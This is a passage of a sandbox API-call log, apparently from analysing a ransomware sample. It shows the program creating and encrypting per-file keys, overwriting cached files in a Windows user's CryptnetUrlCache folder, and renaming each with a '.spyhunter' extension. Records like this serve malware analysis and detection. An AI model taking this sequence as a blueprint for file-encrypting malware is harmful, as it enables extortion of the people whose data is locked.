"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.spyhunter")) returned 1 [0151.834] GetProcessHeap () returned 0x2c0000 [0151.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.834] GetProcessHeap () returned 0x2c0000 [0151.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.834] GetProcessHeap () returned 0x2c0000 [0151.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fea508 | out: hHeap=0x2c0000) returned 1 [0151.834] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee48 | out: pbBuffer=0x248ee48) returned 1 [0151.834] GetProcessHeap () returned 0x2c0000 [0151.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.835] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee40*=0x30) returned 1 [0151.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.835] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 152 [0151.835] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".txt") returned 0x0 [0151.835] GetProcessHeap () returned 0x2c0000 [0151.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.835] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee04*=0x198, lpOverlapped=0x0) returned 1 [0151.836] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.836] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x198, lpNumberOfBytesWritten=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee04*=0x198, lpOverlapped=0x0) returned 1 [0151.836] GetProcessHeap () returned 0x2c0000 [0151.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.836] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.836] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x248ee44*, lpNumberOfBytesWritten=0x248ee04*=0x4, lpOverlapped=0x0) returned 1 [0151.836] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee04*=0x30, lpOverlapped=0x0) returned 1 [0151.836] CloseHandle (hObject=0xb0) returned 1 [0151.837] GetProcessHeap () returned 0x2c0000 [0151.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.837] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.spyhunter") returned 162 [0151.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.spyhunter")) returned 1 [0151.837] GetProcessHeap () returned 0x2c0000 [0151.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.837] GetProcessHeap () returned 0x2c0000 [0151.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.838] GetProcessHeap () returned 0x2c0000 [0151.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fea380 | out: hHeap=0x2c0000) returned 1 [0151.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee40 | out: pbBuffer=0x248ee40) returned 1 [0151.838] GetProcessHeap () returned 0x2c0000 [0151.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee38*=0x30) returned 1 [0151.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.838] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 152 [0151.838] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".txt") returned 0x0 [0151.838] GetProcessHeap () returned 0x2c0000 [0151.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.839] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248edfc*=0x194, lpOverlapped=0x0) returned 1 [0151.839] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.839] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248edfc*=0x194, lpOverlapped=0x0) returned 1 [0151.840] GetProcessHeap () returned 0x2c0000 [0151.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.840] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.840] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x248ee3c*, lpNumberOfBytesWritten=0x248edfc*=0x4, lpOverlapped=0x0) returned 1 [0151.840] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edfc*=0x30, lpOverlapped=0x0) returned 1 [0151.840] CloseHandle (hObject=0xb0) returned 1 [0151.840] GetProcessHeap () returned 0x2c0000 [0151.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.840] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.spyhunter") returned 162 [0151.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.spyhunter")) returned 1 [0151.841] GetProcessHeap () returned 0x2c0000 [0151.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.841] GetProcessHeap () returned 0x2c0000 [0151.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.841] GetProcessHeap () returned 0x2c0000 [0151.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fea1f8 | out: hHeap=0x2c0000) returned 1 [0151.841] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee40 | out: pbBuffer=0x248ee40) returned 1 [0151.841] GetProcessHeap () returned 0x2c0000 [0151.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.841] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee38*=0x30) returned 1 [0151.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.842] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 152 [0151.842] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".txt") returned 0x0 [0151.842] GetProcessHeap () returned 0x2c0000 [0151.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.842] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248edfc*=0x194, lpOverlapped=0x0) returned 1 [0151.843] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.843] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248edfc*=0x194, lpOverlapped=0x0) returned 1 [0151.843] GetProcessHeap () returned 0x2c0000 [0151.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.843] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.843] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x248ee3c*, lpNumberOfBytesWritten=0x248edfc*=0x4, lpOverlapped=0x0) returned 1 [0151.843] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edfc*=0x30, lpOverlapped=0x0) returned 1 [0151.843] CloseHandle (hObject=0xb0) returned 1 [0151.843] GetProcessHeap () returned 0x2c0000 [0151.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.844] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.spyhunter") returned 162 [0151.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.spyhunter")) returned 1 [0151.844] GetProcessHeap () returned 0x2c0000 [0151.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.844] GetProcessHeap () returned 0x2c0000 [0151.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.844] GetProcessHeap () returned 0x2c0000 [0151.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fea070 | out: hHeap=0x2c0000) returned 1 [0151.844] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee38 | out: pbBuffer=0x248ee38) returned 1 [0151.845] GetProcessHeap () returned 0x2c0000 [0151.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.845] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee30*=0x30) returned 1 [0151.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 119 [0151.846] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0151.846] GetProcessHeap () returned 0x2c0000 [0151.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.846] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248edf4*=0xdc, lpOverlapped=0x0) returned 1 [0151.848] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.849] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248edf4*=0xdc, lpOverlapped=0x0) returned 1 [0151.849] GetProcessHeap () returned 0x2c0000 [0151.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.849] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.849] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x248ee34*, lpNumberOfBytesWritten=0x248edf4*=0x4, lpOverlapped=0x0) returned 1 [0151.849] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edf4*=0x30, lpOverlapped=0x0) returned 1 [0151.849] CloseHandle (hObject=0xb0) returned 1 [0151.849] GetProcessHeap () returned 0x2c0000 [0151.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.849] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.spyhunter") returned 129 [0151.849] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.spyhunter")) returned 1 [0151.850] GetProcessHeap () returned 0x2c0000 [0151.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.850] GetProcessHeap () returned 0x2c0000 [0151.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.850] GetProcessHeap () returned 0x2c0000 [0151.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8158 | out: hHeap=0x2c0000) returned 1 [0151.850] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee38 | out: pbBuffer=0x248ee38) returned 1 [0151.850] GetProcessHeap () returned 0x2c0000 [0151.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.851] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee30*=0x30) returned 1 [0151.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 152 [0151.851] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".txt") returned 0x0 [0151.851] GetProcessHeap () returned 0x2c0000 [0151.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.851] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248edf4*=0x1b2, lpOverlapped=0x0) returned 1 [0151.852] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.852] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b2, lpNumberOfBytesWritten=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248edf4*=0x1b2, lpOverlapped=0x0) returned 1 [0151.852] GetProcessHeap () returned 0x2c0000 [0151.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.852] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.852] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x248ee34*, lpNumberOfBytesWritten=0x248edf4*=0x4, lpOverlapped=0x0) returned 1 [0151.853] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248edf4*=0x30, lpOverlapped=0x0) returned 1 [0151.853] CloseHandle (hObject=0xb0) returned 1 [0151.853] GetProcessHeap () returned 0x2c0000 [0151.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.853] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.spyhunter") returned 162 [0151.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.spyhunter")) returned 1 [0151.854] GetProcessHeap () returned 0x2c0000 [0151.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.855] GetProcessHeap () returned 0x2c0000 [0151.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.855] GetProcessHeap () returned 0x2c0000 [0151.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9ee8 | out: hHeap=0x2c0000) returned 1 [0151.855] CryptGenRandom 